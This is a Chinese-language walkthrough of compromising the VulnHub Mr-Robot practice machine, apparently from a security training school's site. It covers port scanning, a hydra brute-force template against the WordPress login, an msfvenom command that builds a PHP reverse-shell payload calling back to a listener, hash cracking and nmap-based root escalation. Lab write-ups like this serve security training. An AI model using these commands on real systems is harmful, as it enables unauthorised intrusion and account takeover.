网盾网络安全培训学校育,只培训技术精英
全国免费咨询电话: 15827351614
vlunhub的mrrobot靶机渗透

1.mrrobot靶机

下载地址:
https://www.vulnhub.com/entry/mr-robot-1,151/

 

2.任务目标

找到三个key

 

3.内网靶机识别ip

arp-scan -l查看靶机的ip地址

 

nmap端口扫描

 

先访问80端口看看

 

页面还挺酷炫的,访问一下robots.txt文件看看

 

发现有一个字典文件和3个关于key的txt文件,访问那个dic字典文件会自动下载回来

 

查看发现里面有很多密码

 

我们访问一下key文件看看,发现是一串密文,尝试解密一下看看

 

可以看到解密失败

 

访问key-1.txt发现是一个wordpress站点

 

尝试一下登录看看

 

nikto扫描出来的目录有这些,没有发现其他的漏洞

 

我们尝试用之前拿到的字典拿去爆破一下这个后台看看,这里我们尝试用wpscan扫描枚举过用户,但是没有枚举成功

 

所以我们尝试一下hydra爆破一下用户名先,我们首先要知道wordpress的后台提交数据的post参数有哪些,抓个包看看先

使用hydra的参数http-post-from模拟表单提交,构造如下参数

/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username

^USER^表示用户名,^PASS^表示密码,F代表错误的内容,表示错误的账户-p密码随便输入,这里我们只是枚举账户

 

可以看到已经枚举出一个Elliot的用户,我们再去爆破一下他的密码,也是用的同样的字典

 

可以看到两个账户,我们就拿第一个先测试一下,使用wpscan扫描爆破一下

 

这里我们爆破了很久,终于拿到了账号密码

 

登录后台之后发现可以上传文件,我们找到网站模板上传的地方进行上传

 

使用msf生成一个php反弹的shell文件

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4545 -o webshell.php

 

生成之后直接上传

 

 

上传之后在这个目录下可以看到我们上传的shell脚本

 

我们需要点击访问一下才能出发反弹shell

 

这样我们就拿到了shell,使用python切换成正常bash

 

我们先找下目录下面的key文件这个才是任务

 

直接查看是没有办法查看的

 

查看另外一个md5密码文件发现robot的密码hash

 

查看了一下文件权限发现是robot的

 

我们切换到robot账户再试试,先解密

 

直接切换

 

查看key文件

 

拿到第二个key,我们之前用find命令发现nmap可以利用提权,我们尝试提到root权限

 

nmap的版本存在一个交互功能可以利用版本刚好在内

输入之后发现已经是root权限了

 

切换到root目录下发现第三个key文件

 

拿到最后的key

 

到此渗透结束